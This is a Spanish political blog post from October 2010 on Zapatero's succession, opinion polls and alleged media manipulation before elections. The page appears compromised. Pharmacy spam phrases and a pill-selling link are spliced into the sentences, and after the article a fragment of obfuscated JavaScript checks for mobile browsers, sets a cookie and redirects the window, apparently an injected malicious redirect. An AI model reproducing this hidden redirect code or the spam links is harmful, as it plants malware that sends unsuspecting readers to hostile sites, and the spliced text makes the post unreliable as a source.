• Zapatero anunciara el miércoles quien será el próximo Ministro de Trabajo. Es decir, lo hará cuando termine la votación de los presupuestos 2011. Y el sábado se reunirá con la Ejecutiva para, no solo consolarlos, sino prometerles la victoria gracias a la coalición PSOE-PNV-CC-UPN. Zapatero ha demostrado ser eclíptico e imprevisible incluso en esto. Ha dejado descolocado al pobre Rajoy. A partir de ahora juro que pensaré con tranquilidad que no me creeré nada de lo que vaya diciendo Cospedal. Para mí, Cospedal perdida. Ya decía The Economist que algo así como que en España, perderá las elecciones, el partido que más tarde en jubilar a su Presidente. En esto estamos, en las herencias de Gobierno y del jefe de la opinión. Ha llegado el momento de la guerra a través de los medios de comunicación. Para alguna gente esta guerra es algo novedoso aunque nosotros venimos diciéndolo desde hace mucho tiempo incluso el jueves pasado dijimos «Muchísimas veces hemos dicho que la batalla política preelectoral se desarrolla y desarrollará a través de los medios de comunicación». De estas manipulaciones de la verdad en la prensa escrita como consuelo político habla el profesor Enrique Gil Calvo over the counter nasonex coupon en el PAIS de hoy. Porque la prensa no dejará de publicar una encuesta de intención de voto a la semana. Por ejemplo, EL SEMANAL DIGITAL.COM afirma que el barómetro de la COPE estima que el PP lograría 176 escaños y el PSEO 130. También NC Report hizo para LA RAZON una encuesta con 1.000 entrevistas de la cual deducía que siete de cada 10 españoles piden una crisis de Gobierno. 

    Valoración del Gabinete según la encuesta NC Report

    La manipulación inundará todos los medios de comunicación. Ya lo ha hecho cuando, por ejemplo, en EL MUNDO de hoy se dedican dos páginas enteras a decir que «»una veintena de diputados y dirigentes del PSEO aceptan hacer quíñelas sobre la sucesión BAJO ANONIMATO. ¡Contestaciones anónimas! Pills Frente a esta manipulación mediática poco tiene que hacer Pajín diciendo en una entrevista de Esther Esteban que «»no hay conspiración contra Zapatero»». Porque la recesión y la caída de los ingresos fiscales impide romper la espiral actividad-paro-impuestos-deflación  que dificultan el pago a los acreedores de la deuda externa. Y menos todavía cuando  José Blanco  afirma en una entrevista al ABC «»si son necesarias más medias para cumplir con el déficit, se tomarán»».

    Recuerdan a Belén Barreiro. Es la ex- presidente del CIS que fue despedida por María Teresa Fernández de la Vega ahora ha conseguido que el director del EL PAIS Pills le publique una opinion en la que dice «»Como ha mostrado Lynn Vavreck en The Message Matters cephalexin rash treatment http://smsphil.com/cheap-cabgolin/ Purchase (2009), y como bien ilustra el caso español, para poder neutralizar el efecto de la economía en los resultados electorales, un partido, ya esté en el Gobierno o en la oposición, ha de elegir asuntos que reúnan tres características: (1) que sean prioritarios para los ciudadanos; (2) que logren un amplio apoyo social; y (3) que la ciudadanía perciba que, en ese ámbito, ese partido es más capaz que su rival»». Así que, al decir de Carlos E. Cué, Arriola, el sociólogo de Rajoy, ha logrado que «»Todos se la atribuyen a Pedro Arriola, principal consejero de Rajoy. El objetivo: no movilizar a la izquierda que, según su análisis, dio la victoria a Zapatero en 2008. «Todos los periódicos criticáis la estrategia de perfil bajo de Mariano Rajoy. Pero los mismos que habláis de eso, publicáis encuestas en las que estamos a 14 puntos. ¿Por qué tendríamos que cambiar? Nos estáis animando a seguir así», analiza uno de los dirigentes más relevantes. La cúpula tiene muy analizado el fenómeno de David Cameron, que detalló sus medidas más duras y cayó en las encuestas. Esos recortes drásticos están ya en la mente y las reuniones discretas del PP, pero no se harán públicos en ningún caso. Los pondrán en marcha cuando gobiernen»». De eso estamos seguro todos los que miramos el futuro y hacemos prospectiva de la política económica de los próximos años. Para el periodista Fernando Onega. Ya hemos contado como el PP tienen avanzada la redacción del programa electoral para el 2012. Pero en él no estará todo lo que piensa Rajoy. No están, por ejemplo, todas las reformas que proyecta efectuar nada más llegar al gobierno. Fíjense en como serán de duras, que un asesor explica así el sigilo: «Rajoy sabe que, si las anuncia, a lo mejor no las puede acometer».

     

    whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

  • Comments are closed.

Calendario de artículos

octubre 2010
L M X J V S D
 123
45678910
11121314151617
18192021222324
25262728293031

Artículos anteriores